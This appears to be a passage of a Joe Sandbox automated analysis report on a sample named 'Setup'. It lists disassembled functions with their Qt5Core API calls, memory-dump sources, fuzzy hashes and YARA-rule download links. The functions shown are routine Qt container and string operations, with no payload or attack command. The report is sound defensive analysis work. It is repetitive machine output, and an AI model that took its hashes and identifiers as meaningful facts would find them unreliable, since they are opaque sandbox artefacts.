                                                                                                                                                              • Instruction Fuzzy Hash: 94216272B0A54286E7A68F35E94017D6362FB04FA9B584131CE9D57668DF3CE982CF40
                                                                                                                                                              Function 00007FFBA19752B0 Relevance: 6.1, APIs: 4, Instructions: 63timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE ref: 00007FFBA1993D73
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE ref: 00007FFBA1993D82
                                                                                                                                                                • Part of subcall function 00007FFBA1991640: ??0QDateTime@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA19A1772), ref: 00007FFBA1991653
                                                                                                                                                                • Part of subcall function 00007FFBA1994410: ?host@QUrl@@QEBA?AVQString@@V?$QFlags@W4ComponentFormattingOption@QUrl@@@@@Z.QT5CORE(?,?,?,00007FFBA19A16F2), ref: 00007FFBA1994420
                                                                                                                                                                • Part of subcall function 00007FFBA1993E40: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1993E87
                                                                                                                                                                • Part of subcall function 00007FFBA1993E40: ??0QStringRef@@QEAA@XZ.QT5CORE ref: 00007FFBA1993E91
                                                                                                                                                                • Part of subcall function 00007FFBA1993E40: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1993F35
                                                                                                                                                                • Part of subcall function 00007FFBA1993E40: ??0QStringRef@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1993F43
                                                                                                                                                                • Part of subcall function 00007FFBA1993E40: ?childEvent@QObject@@MEAAXPEAVQChildEvent@@@Z.QT5CORE ref: 00007FFBA1993F7E
                                                                                                                                                                • Part of subcall function 00007FFBA1993E40: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1993F88
                                                                                                                                                                • Part of subcall function 00007FFBA1993E40: ?childEvent@QObject@@MEAAXPEAVQChildEvent@@@Z.QT5CORE ref: 00007FFBA1993FE2
                                                                                                                                                                • Part of subcall function 00007FFBA1993E40: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1993FEC
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1993DE5
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA1993DF0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@V0@@$?child?data@ArrayArray@@ByteChildData@@DateEvent@Event@@@Object@@Ref@@StringTime@@$?host@ComponentFlags@FormattingOption@Url@@Url@@@@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1288083544-0
                                                                                                                                                              • Opcode ID: 4f89a7bd79c910d508725fd5ba1dedc689b4453c5fc429dfddd45550c3d0a5fd
                                                                                                                                                              • Instruction ID: e4b830e305bcf59793bf3ec7d46db09d9456f3b78ca08200179ae4ab3aee4d1e
                                                                                                                                                              • Opcode Fuzzy Hash: 4f89a7bd79c910d508725fd5ba1dedc689b4453c5fc429dfddd45550c3d0a5fd
                                                                                                                                                              • Instruction Fuzzy Hash: E82151A2A1AA9182DB51DF22E4001BDA7A4FB88FD8F444131EE4E47B69DF3CD546CB04
                                                                                                                                                              Function 00007FFBA1974290 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?detach@?end@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2291827984-0
                                                                                                                                                              • Opcode ID: 5cef78b84985dba592012a81106e810f23f6ba4120244e86853fc0b3cba040a9
                                                                                                                                                              • Instruction ID: f0383e07d3c9ef64741ea785dd2ddc6307b094e83102028c4f1854f81c63dc85
                                                                                                                                                              • Opcode Fuzzy Hash: 5cef78b84985dba592012a81106e810f23f6ba4120244e86853fc0b3cba040a9
                                                                                                                                                              • Instruction Fuzzy Hash: 2E118176B0AB4582DF918B2AFA400686365EF99FD4B588032DE6E07B55EE3CD491CF40
                                                                                                                                                              Function 00007FFBA19741B0 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?detach@?end@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2291827984-0
                                                                                                                                                              • Opcode ID: 8a76a5ee6de2f8c11a31c37ba44cdf188a574f502ac536c817f3c257da9ac117
                                                                                                                                                              • Instruction ID: c6c10040b7012c7ccda6bb2d3774b738d66eae19a7b01324761b098b9d8b68e7
                                                                                                                                                              • Opcode Fuzzy Hash: 8a76a5ee6de2f8c11a31c37ba44cdf188a574f502ac536c817f3c257da9ac117
                                                                                                                                                              • Instruction Fuzzy Hash: 8F11C376B0AB4582DF819B2AF9400686361EF88FD4B188031DF5E07B55EE3CD4A2CB00
                                                                                                                                                              Function 00007FFBA19F4650 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA19F507F,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA19F4681
                                                                                                                                                              • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,00000000,00000000,00007FFBA19F507F,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA19F468F
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA19F507F,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA19F469B
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA19F507F,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBA19F46A7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?detach@?end@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2291827984-0
                                                                                                                                                              • Opcode ID: 84010254d9851169a922b32df67799f54acccfae53e50c5a9a601f9c19406162
                                                                                                                                                              • Instruction ID: ba35573b3f5ca766f6f92a2d4c4e8e96060de68f639f53501c611b5976907de9
                                                                                                                                                              • Opcode Fuzzy Hash: 84010254d9851169a922b32df67799f54acccfae53e50c5a9a601f9c19406162
                                                                                                                                                              • Instruction Fuzzy Hash: A8119D76B1AA4282EB919B76E84406963A1FB86FE4F18C131DE5D07794DF3CD446CB00
                                                                                                                                                              Function 00007FFBA1980200 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?detach@?end@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2291827984-0
                                                                                                                                                              • Opcode ID: b41c966b74ed0d0afa28fd168af327f74ad23524564dbb52fe90dc3ffa51632b
                                                                                                                                                              • Instruction ID: 8de19b73924bb2958b2e8664e690c4f41e7a42ff320ed4421dc5b7230931a9f4
                                                                                                                                                              • Opcode Fuzzy Hash: b41c966b74ed0d0afa28fd168af327f74ad23524564dbb52fe90dc3ffa51632b
                                                                                                                                                              • Instruction Fuzzy Hash: 46119476B1AB4582EF968F26E8545282361BB88FE4B488135DE5D07B54DF3CD896CB00
                                                                                                                                                              Function 00007FFBA1A01450 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,?,00000000,00007FFBA1A04C43), ref: 00007FFBA1A0149B
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1A04C43), ref: 00007FFBA1A014A4
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1A04C43), ref: 00007FFBA1A014B0
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1A04C43), ref: 00007FFBA1A014BC
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?detach@?end@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2291827984-0
                                                                                                                                                              • Opcode ID: d8988c66a6d0efb2ba259f8e63d720c80a45c97f5582013f3770068f8d57d101
                                                                                                                                                              • Instruction ID: 1ebb556271cbc092d847ad6ae61fe8f86c86f43f21ef3dc5c83a90bb9dd4500f
                                                                                                                                                              • Opcode Fuzzy Hash: d8988c66a6d0efb2ba259f8e63d720c80a45c97f5582013f3770068f8d57d101
                                                                                                                                                              • Instruction Fuzzy Hash: 45119476B0AB4586DF919F26F9400697365EB88FD4F184032EF5E47765EE3CD4518B00
                                                                                                                                                              Function 00007FFBA1A213F0 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,?,00000000,00007FFBA1A27EF0,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A2143B
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1A27EF0,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A21444
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1A27EF0,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A21450
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1A27EF0,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A2145C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?detach@?end@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2291827984-0
                                                                                                                                                              • Opcode ID: 8e8c00a9605bb67929e0104b86af25edf0759ba6105ff315aba7609bb1735cfe
                                                                                                                                                              • Instruction ID: 3b0dc6b0b7ed2b453d32ec883a1fd6e3d4ca24e5ddcb73ed26d545dc3d22b3fc
                                                                                                                                                              • Opcode Fuzzy Hash: 8e8c00a9605bb67929e0104b86af25edf0759ba6105ff315aba7609bb1735cfe
                                                                                                                                                              • Instruction Fuzzy Hash: B711E7B6B0AB4186DF819F26F9400687361EB88FD0B184032DF6E47765EE3CD4918B00
                                                                                                                                                              Function 00007FFBA197DCB0 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?detach@?end@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2291827984-0
                                                                                                                                                              • Opcode ID: c1ae22ffda0154e3517a8a9eb5dff9327b787006314421aca953454881f07384
                                                                                                                                                              • Instruction ID: 1cc7ae4044a25b8089729c281c4b19ab08b47fedbbfa46c8ab2e836ed35975fe
                                                                                                                                                              • Opcode Fuzzy Hash: c1ae22ffda0154e3517a8a9eb5dff9327b787006314421aca953454881f07384
                                                                                                                                                              • Instruction Fuzzy Hash: 77118166B09B4182DF919F26F9401A973A1EB88FD4F584031DE5E47B64EF3CD482CB00
                                                                                                                                                              Function 00007FFBA1A214A0 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,?,00000000,00007FFBA1A27F2A,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A214EB
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1A27F2A,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A214F4
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1A27F2A,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A21500
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1A27F2A,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A2150C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?detach@?end@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2291827984-0
                                                                                                                                                              • Opcode ID: 6f7dfb9e89a97e3397ce2e1d8e20e8e6aa21c0779b874b7ab12fb103c7c2f3f3
                                                                                                                                                              • Instruction ID: d48c6cc8ecd08c93dfdf1716807dc6ec88e0125cc000f80c8a6ae881d5cf7a48
                                                                                                                                                              • Opcode Fuzzy Hash: 6f7dfb9e89a97e3397ce2e1d8e20e8e6aa21c0779b874b7ab12fb103c7c2f3f3
                                                                                                                                                              • Instruction Fuzzy Hash: 3F119476B0AB4186DF919F26F9400697365EB89FD0B1C9032DE5E47765EE3CD4918B00
                                                                                                                                                              Function 00007FFBA1987E40 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QIODevicePrivate@@QEAA@XZ.QT5CORE(?,?,?,?,00000000,00007FFBA19CE780), ref: 00007FFBA1987E4D
                                                                                                                                                                • Part of subcall function 00007FFBA19840A0: ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1987D68), ref: 00007FFBA19840C2
                                                                                                                                                                • Part of subcall function 00007FFBA19840A0: ??0QMutex@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1987D68), ref: 00007FFBA19840F7
                                                                                                                                                                • Part of subcall function 00007FFBA19840A0: ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1984113
                                                                                                                                                              • ??0QMutex@@QEAA@XZ.QT5CORE(?,?,?,?,00000000,00007FFBA19CE780), ref: 00007FFBA1987EB6
                                                                                                                                                              • ??0QVariant@@QEAA@_N@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19CE780), ref: 00007FFBA1987F13
                                                                                                                                                                • Part of subcall function 00007FFBA1985660: ?willGrow@QHashData@@QEAA_NXZ.QT5CORE ref: 00007FFBA19856ED
                                                                                                                                                                • Part of subcall function 00007FFBA1985660: ?allocateNode@QHashData@@QEAAPEAXH@Z.QT5CORE ref: 00007FFBA1985748
                                                                                                                                                                • Part of subcall function 00007FFBA1985660: ??0QVariant@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1985767
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFBA1987F41
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Variant@@$Data@@HashMutex@@$?allocate?willBasicDeviceGrow@Node@Private@@String@@Timer@@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1539146754-0
                                                                                                                                                              • Opcode ID: 30929ce53b2fda68a76e06c993d815f26cbf27f7bf404e4d807ecf3ce2684e56
                                                                                                                                                              • Instruction ID: 2420a9aca7c753f3144af37415dac586fb60003476dd433be92eb77b033b5162
                                                                                                                                                              • Opcode Fuzzy Hash: 30929ce53b2fda68a76e06c993d815f26cbf27f7bf404e4d807ecf3ce2684e56
                                                                                                                                                              • Instruction Fuzzy Hash: EA21F37250AB8681D781CF31E8403D973A8FB58BA8F584136DE9D4B769EF38C195CB60
                                                                                                                                                              Function 00007FFBA197F8A0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA197E900: ??0QByteArray@@QEAA@UQByteArrayDataPtr@@@Z.QT5CORE ref: 00007FFBA197E936
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1973B1F
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?detach_grow@QListData@@QEAAPEAUData@1@PEAHH@Z.QT5CORE ref: 00007FFBA1973B36
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1973B42
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1973B54
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1973B77
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1973B92
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1973B9E
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1973BC6
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1973C27
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA1973C35
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1973C3E
                                                                                                                                                                • Part of subcall function 00007FFBA1973AE0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1973C50
                                                                                                                                                              • ??0QByteArray@@QEAA@UQByteArrayDataPtr@@@Z.QT5CORE ref: 00007FFBA197F908
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA197F920
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA197F92B
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA197F98C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
